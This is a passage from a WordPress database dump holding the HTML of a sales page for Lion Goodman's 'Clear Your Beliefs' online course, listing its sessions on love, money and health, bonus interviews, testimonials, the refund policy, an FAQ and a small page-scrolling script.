<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
